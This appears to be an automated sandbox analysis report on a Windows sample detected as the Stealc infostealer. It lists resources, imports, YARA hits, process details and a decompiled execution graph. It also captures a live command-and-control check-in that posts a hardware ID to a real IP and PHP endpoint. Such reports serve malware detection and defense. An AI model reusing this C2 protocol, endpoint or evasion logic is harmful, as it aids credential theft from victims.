                                RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5652985074626866
                                RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5652985074626866
                                RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5451263537906137
                                RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5451263537906137
                                RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6213872832369942
                                RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6213872832369942
                                RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46172199170124484
                                RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46172199170124484
                                RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4920262664165103
                                RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4920262664165103
                                RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4954918032786885
                                RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4954918032786885
                                RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3784648187633262
                                RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3784648187633262
                                RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5058664259927798
                                RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5058664259927798
                                RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5599078341013825
                                RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5599078341013825
                                RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.583092485549133
                                RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.583092485549133
                                RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.41228893058161353
                                RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.41228893058161353
                                RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.40081967213114755
                                RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.40081967213114755
                                RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.46897163120567376
                                RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.46897163120567376
                                RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3742004264392324
                                RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3742004264392324
                                RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5171480144404332
                                RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                                RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                                RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                                RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                                RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                                RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                                RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                                RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                                RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                                RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                                RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                                RT_DIALOG0x7dc300x58data0.8977272727272727
                                RT_STRING0x7dc880x2c6dataTamilIndia0.4830985915492958
                                RT_STRING0x7dc880x2c6dataTamilSri Lanka0.4830985915492958
                                RT_STRING0x7df500x6b4dataTamilIndia0.42657342657342656
                                RT_STRING0x7df500x6b4dataTamilSri Lanka0.42657342657342656
                                RT_STRING0x7e6080x242dataTamilIndia0.4982698961937716
                                RT_STRING0x7e6080x242dataTamilSri Lanka0.4982698961937716
                                RT_STRING0x7e8500x620dataTamilIndia0.4343112244897959
                                RT_STRING0x7e8500x620dataTamilSri Lanka0.4343112244897959
                                RT_STRING0x7ee700x292dataTamilIndia0.4817629179331307
                                RT_STRING0x7ee700x292dataTamilSri Lanka0.4817629179331307
                                RT_ACCELERATOR0x79b300x48dataTamilIndia0.8472222222222222
                                RT_ACCELERATOR0x79b300x48dataTamilSri Lanka0.8472222222222222
                                RT_GROUP_CURSOR0x79fd80x22data1.0294117647058822
                                RT_GROUP_CURSOR0x7bcb80x30data0.9375
                                RT_GROUP_CURSOR0x7d9a00x30data0.9375
                                RT_GROUP_ICON0x6ca580x68dataTamilIndia0.7019230769230769
                                RT_GROUP_ICON0x6ca580x68dataTamilSri Lanka0.7019230769230769
                                RT_GROUP_ICON0x668f80x68dataTamilIndia0.6826923076923077
                                RT_GROUP_ICON0x668f80x68dataTamilSri Lanka0.6826923076923077
                                RT_GROUP_ICON0x732800x76dataTamilIndia0.6779661016949152
                                RT_GROUP_ICON0x732800x76dataTamilSri Lanka0.6779661016949152
                                RT_GROUP_ICON0x79ab80x76dataTamilIndia0.6779661016949152
                                RT_GROUP_ICON0x79ab80x76dataTamilSri Lanka0.6779661016949152
                                RT_VERSION0x7d9d00x25cdata0.5413907284768212
                                DLLImport
                                KERNEL32.dllInterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
                                GDI32.dllGetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
                                ADVAPI32.dllReadEventLogW
                                ole32.dllCoSuspendClassObjects
                                WINHTTP.dllWinHttpOpen, WinHttpCheckPlatform
                                Language of compilation systemCountry where language is spokenMap
                                TamilIndia
                                TamilSri Lanka
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-08T03:52:04.363921+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.204.41.15080TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 8, 2024 03:52:02.953155041 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:02.958199978 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:02.958530903 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:02.958530903 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:02.963416100 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:03.666327953 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:03.666629076 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:03.811660051 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:03.816556931 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:04.363717079 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:04.363920927 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:09.364485025 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 03:52:09.364722967 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 03:52:20.265671968 CEST4970480192.168.2.562.204.41.150
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 8, 2024 03:52:44.930264950 CEST5359808162.159.36.2192.168.2.5
                                Oct 8, 2024 03:52:45.407331944 CEST53639701.1.1.1192.168.2.5
                                • 62.204.41.150
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970462.204.41.150805500C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
                                TimestampBytes transferredDirectionData
                                Oct 8, 2024 03:52:02.958530903 CEST88OUTGET / HTTP/1.1
                                Host: 62.204.41.150
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 8, 2024 03:52:03.666327953 CEST203INHTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 01:52:03 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 8, 2024 03:52:03.811660051 CEST418OUTPOST /edd20096ecef326d.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC
                                Host: 62.204.41.150
                                Content-Length: 218
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a
                                Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--
                                Oct 8, 2024 03:52:04.363717079 CEST210INHTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 01:52:03 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:21:52:00
                                Start date:07/10/2024
                                Path:C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe"
                                Imagebase:0x400000
                                File size:454'144 bytes
                                MD5 hash:E35C6AD41081DDCDA2BA9C65B5B1A6F8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:21:52:03
                                Start date:07/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308
                                Imagebase:0x1a0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:7.2%
                                  Dynamic/Decrypted Code Coverage:6.7%
                                  Signature Coverage:12.7%
                                  Total number of Nodes:1425
                                  Total number of Limit Nodes:26
                                  execution_graph 27673 409440 strlen malloc strcpy_s free std::exception::exception 27710 22a932a ??2@YAPAXI RaiseException allocator 27731 41ce48 LeaveCriticalSection type_info::_Type_info_dtor 27773 22b1525 strtok_s strtok_s lstrlen lstrcpy codecvt 27675 41b050 6 API calls 3 library calls 27713 22a9b37 9 API calls 27735 22b1c35 110 API calls 27776 406f60 memcpy 27677 22b6a0a ExitProcess 27678 41dc60 atexit 27778 410765 279 API calls 27736 417667 lstrcpy 27779 22bd106 41 API calls __amsg_exit 27648 22a0005 27653 22a092b GetPEB 27648->27653 27650 22a0030 27654 22a003c 27650->27654 27653->27650 27655 22a0049 27654->27655 27667 22a0e0f SetErrorMode SetErrorMode 27655->27667 27660 22a0265 27661 22a02ce VirtualProtect 27660->27661 27663 22a030b 27661->27663 27662 22a0439 VirtualFree 27666 22a04be LoadLibraryA 27662->27666 27663->27662 27665 22a08c7 27666->27665 27668 22a0223 27667->27668 27669 22a0d90 27668->27669 27670 22a0dad 27669->27670 27671 22a0dbb GetPEB 27670->27671 27672 22a0238 VirtualAlloc 27670->27672 27671->27672 27672->27660 27737 41b270 5 API calls 2 library calls 27681 22b15b3 18 API calls codecvt 27781 22af567 56 API calls 27782 22afd67 152 API calls 27683 41bc11 71 API calls 2 library calls 27684 22bbe78 162 API calls 2 library calls 27685 22bcd97 170 API calls 2 library calls 27686 22b3b7d 91 API calls 2 library calls 27687 22b6a40 6 API calls 27688 41ac2c 71 API calls 2 library calls 27784 22b6d18 643 API calls 27743 22b102b strtok_s lstrlen lstrcpy 27744 22b140b strtok_s 27746 22b6c57 689 API calls 27747 22b140b StrCmpCA strtok_s 27689 4090c3 5 API calls allocator 27748 22bd0af RtlLeaveCriticalSection __mtinitlocknum 27690 22b32ae 22 API calls 27787 22bcd90 173 API calls 3 library calls 27788 41abd0 free moneypunct std::exception::_Tidy 27692 22a6ebc VirtualProtect 27790 413916 91 API calls 2 library calls 27630 752ae9 27633 752afa 27630->27633 27634 752b09 27633->27634 27637 75329a 27634->27637 27639 7532b5 27637->27639 27638 7532be CreateToolhelp32Snapshot 27638->27639 27640 7532da Module32First 27638->27640 27639->27638 27639->27640 27641 752af9 27640->27641 27642 7532e9 27640->27642 27644 752f59 27642->27644 27645 752f84 27644->27645 27646 752f95 VirtualAlloc 27645->27646 27647 752fcd 27645->27647 27646->27647 27750 22b04b7 88 API calls 27751 22b0cb6 30 API calls 27791 4183dc 15 API calls 27792 22b118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27793 22bcd8f 6 API calls 2 library calls 27752 22b102b StrCmpCA strtok_s lstrlen lstrcpy 27696 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27754 22b3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27755 41ceea SetUnhandledExceptionFilter 26211 4169f0 26254 402260 26211->26254 26228 417850 3 API calls 26229 416a30 26228->26229 26230 4178e0 3 API calls 26229->26230 26231 416a43 26230->26231 26387 41a9b0 26231->26387 26233 416a64 26234 41a9b0 4 API calls 26233->26234 26235 416a6b 26234->26235 26236 41a9b0 4 API calls 26235->26236 26237 416a72 26236->26237 26238 41a9b0 4 API calls 26237->26238 26239 416a79 26238->26239 26240 41a9b0 4 API calls 26239->26240 26241 416a80 26240->26241 26395 41a8a0 26241->26395 26243 416b0c 26399 416920 GetSystemTime 26243->26399 26244 416a89 26244->26243 26246 416ac2 OpenEventA 26244->26246 26248 416af5 CloseHandle Sleep 26246->26248 26249 416ad9 26246->26249 26252 416b0a 26248->26252 26253 416ae1 CreateEventA 26249->26253 26251 416b16 CloseHandle ExitProcess 26252->26244 26253->26243 26596 4045c0 17 API calls 26254->26596 26256 402274 26257 4045c0 34 API calls 26256->26257 26258 40228d 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 4022a6 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 4022bf 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 4022d8 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 4022f1 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 40230a 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 402323 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 40233c 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 402355 26273->26274 26275 4045c0 34 API calls 26274->26275 26276 40236e 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 402387 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 4023a0 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 4023b9 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 4023d2 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 4023eb 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 402404 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 40241d 26289->26290 26291 4045c0 34 API calls 26290->26291 26292 402436 26291->26292 26293 4045c0 34 API calls 26292->26293 26294 40244f 26293->26294 26295 4045c0 34 API calls 26294->26295 26296 402468 26295->26296 26297 4045c0 34 API calls 26296->26297 26298 402481 26297->26298 26299 4045c0 34 API calls 26298->26299 26300 40249a 26299->26300 26301 4045c0 34 API calls 26300->26301 26302 4024b3 26301->26302 26303 4045c0 34 API calls 26302->26303 26304 4024cc 26303->26304 26305 4045c0 34 API calls 26304->26305 26306 4024e5 26305->26306 26307 4045c0 34 API calls 26306->26307 26308 4024fe 26307->26308 26309 4045c0 34 API calls 26308->26309 26310 402517 26309->26310 26311 4045c0 34 API calls 26310->26311 26312 402530 26311->26312 26313 4045c0 34 API calls 26312->26313 26314 402549 26313->26314 26315 4045c0 34 API calls 26314->26315 26316 402562 26315->26316 26317 4045c0 34 API calls 26316->26317 26318 40257b 26317->26318 26319 4045c0 34 API calls 26318->26319 26320 402594 26319->26320 26321 4045c0 34 API calls 26320->26321 26322 4025ad 26321->26322 26323 4045c0 34 API calls 26322->26323 26324 4025c6 26323->26324 26325 4045c0 34 API calls 26324->26325 26326 4025df 26325->26326 26327 4045c0 34 API calls 26326->26327 26328 4025f8 26327->26328 26329 4045c0 34 API calls 26328->26329 26330 402611 26329->26330 26331 4045c0 34 API calls 26330->26331 26332 40262a 26331->26332 26333 4045c0 34 API calls 26332->26333 26334 402643 26333->26334 26335 4045c0 34 API calls 26334->26335 26336 40265c 26335->26336 26337 4045c0 34 API calls 26336->26337 26338 402675 26337->26338 26339 4045c0 34 API calls 26338->26339 26340 40268e 26339->26340 26341 419860 26340->26341 26600 419750 GetPEB 26341->26600 26343 419868 26344 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26343->26344 26345 41987a 26343->26345 26346 419af4 GetProcAddress 26344->26346 26347 419b0d 26344->26347 26348 41988c 21 API calls 26345->26348 26346->26347 26349 419b46 26347->26349 26350 419b16 GetProcAddress GetProcAddress 26347->26350 26348->26344 26351 419b68 26349->26351 26352 419b4f GetProcAddress 26349->26352 26350->26349 26353 419b71 GetProcAddress 26351->26353 26354 419b89 26351->26354 26352->26351 26353->26354 26355 416a00 26354->26355 26356 419b92 GetProcAddress GetProcAddress 26354->26356 26357 41a740 26355->26357 26356->26355 26358 41a750 26357->26358 26359 416a0d 26358->26359 26360 41a77e lstrcpy 26358->26360 26361 4011d0 26359->26361 26360->26359 26362 4011e8 26361->26362 26363 401217 26362->26363 26364 40120f ExitProcess 26362->26364 26365 401160 GetSystemInfo 26363->26365 26366 401184 26365->26366 26367 40117c ExitProcess 26365->26367 26368 401110 GetCurrentProcess VirtualAllocExNuma 26366->26368 26369 401141 ExitProcess 26368->26369 26370 401149 26368->26370 26601 4010a0 VirtualAlloc 26370->26601 26373 401220 26605 4189b0 26373->26605 26376 401249 __aulldiv 26377 40129a 26376->26377 26378 401292 ExitProcess 26376->26378 26379 416770 GetUserDefaultLangID 26377->26379 26380 4167d3 GetUserDefaultLCID 26379->26380 26381 416792 26379->26381 26380->26228 26381->26380 26382 4167c1 ExitProcess 26381->26382 26383 4167a3 ExitProcess 26381->26383 26384 4167b7 ExitProcess 26381->26384 26385 4167cb ExitProcess 26381->26385 26386 4167ad ExitProcess 26381->26386 26607 41a710 26387->26607 26389 41a9c1 lstrlenA 26391 41a9e0 26389->26391 26390 41aa18 26608 41a7a0 26390->26608 26391->26390 26393 41a9fa lstrcpy lstrcatA 26391->26393 26393->26390 26394 41aa24 26394->26233 26396 41a8bb 26395->26396 26397 41a90b 26396->26397 26398 41a8f9 lstrcpy 26396->26398 26397->26244 26398->26397 26612 416820 26399->26612 26401 41698e 26402 416998 sscanf 26401->26402 26641 41a800 26402->26641 26404 4169aa SystemTimeToFileTime SystemTimeToFileTime 26405 4169e0 26404->26405 26406 4169ce 26404->26406 26408 415b10 26405->26408 26406->26405 26407 4169d8 ExitProcess 26406->26407 26409 415b1d 26408->26409 26410 41a740 lstrcpy 26409->26410 26411 415b2e 26410->26411 26643 41a820 lstrlenA 26411->26643 26414 41a820 2 API calls 26415 415b64 26414->26415 26416 41a820 2 API calls 26415->26416 26417 415b74 26416->26417 26647 416430 26417->26647 26420 41a820 2 API calls 26421 415b93 26420->26421 26422 41a820 2 API calls 26421->26422 26423 415ba0 26422->26423 26424 41a820 2 API calls 26423->26424 26425 415bad 26424->26425 26426 41a820 2 API calls 26425->26426 26427 415bf9 26426->26427 26656 4026a0 26427->26656 26435 415cc3 26436 416430 lstrcpy 26435->26436 26437 415cd5 26436->26437 26438 41a7a0 lstrcpy 26437->26438 26439 415cf2 26438->26439 26440 41a9b0 4 API calls 26439->26440 26441 415d0a 26440->26441 26442 41a8a0 lstrcpy 26441->26442 26443 415d16 26442->26443 26444 41a9b0 4 API calls 26443->26444 26445 415d3a 26444->26445 26446 41a8a0 lstrcpy 26445->26446 26447 415d46 26446->26447 26448 41a9b0 4 API calls 26447->26448 26449 415d6a 26448->26449 26450 41a8a0 lstrcpy 26449->26450 26451 415d76 26450->26451 26452 41a740 lstrcpy 26451->26452 26453 415d9e 26452->26453 27380 417500 GetWindowsDirectoryA 26453->27380 26456 41a7a0 lstrcpy 26457 415db8 26456->26457 27390 404880 26457->27390 26459 415dbe 27535 4117a0 26459->27535 26461 415dc6 26462 41a740 lstrcpy 26461->26462 26463 415de9 26462->26463 26464 401590 lstrcpy 26463->26464 26465 415dfd 26464->26465 27555 405960 39 API calls moneypunct 26465->27555 26467 415e03 27556 411050 strtok_s strtok_s lstrlenA lstrcpy 26467->27556 26469 415e0e 26470 41a740 lstrcpy 26469->26470 26471 415e32 26470->26471 26472 401590 lstrcpy 26471->26472 26473 415e46 26472->26473 27557 405960 39 API calls moneypunct 26473->27557 26475 415e4c 27558 410d90 